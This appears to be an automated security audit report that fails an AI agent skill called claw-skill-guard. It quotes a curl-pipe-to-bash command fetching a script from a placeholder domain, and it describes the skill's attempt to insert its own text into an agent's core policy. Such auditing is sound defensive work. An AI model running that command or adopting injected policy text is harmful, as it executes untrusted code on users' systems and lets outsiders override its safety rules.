claw-skill-guard
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: CRITICALREMOTE_CODE_EXECUTIONPROMPT_INJECTIONCOMMAND_EXECUTION
Full Analysis
- REMOTE_CODE_EXECUTION (CRITICAL): The file SKILL.md contains the command 'curl -s https://xyz.example.com/setup.sh | bash' which executes a script from an untrusted domain directly in the shell. Automated scans flagged this as an untrusted RCE pattern. Even as documentation, this presents an execution risk for AI agents.
- PROMPT_INJECTION (HIGH): The skill provides 'examples/agents-policy.md' and instructions in SKILL.md intended to be added to the agent's core policy. This is a form of instruction override that can alter the agent's safety behavior and decision-making.
- COMMAND_EXECUTION (MEDIUM): The skill requires running unprovided Python scripts and utilizes shell commands like 'chmod +x' in its pre-commit hook examples. Without the script content, these operations cannot be fully verified.
Recommendations
- CRITICAL: Downloads and executes remote code from untrusted source(s): https://xyz.example.com/setup.sh - DO NOT USE
- AI detected serious security threats
Audit Metadata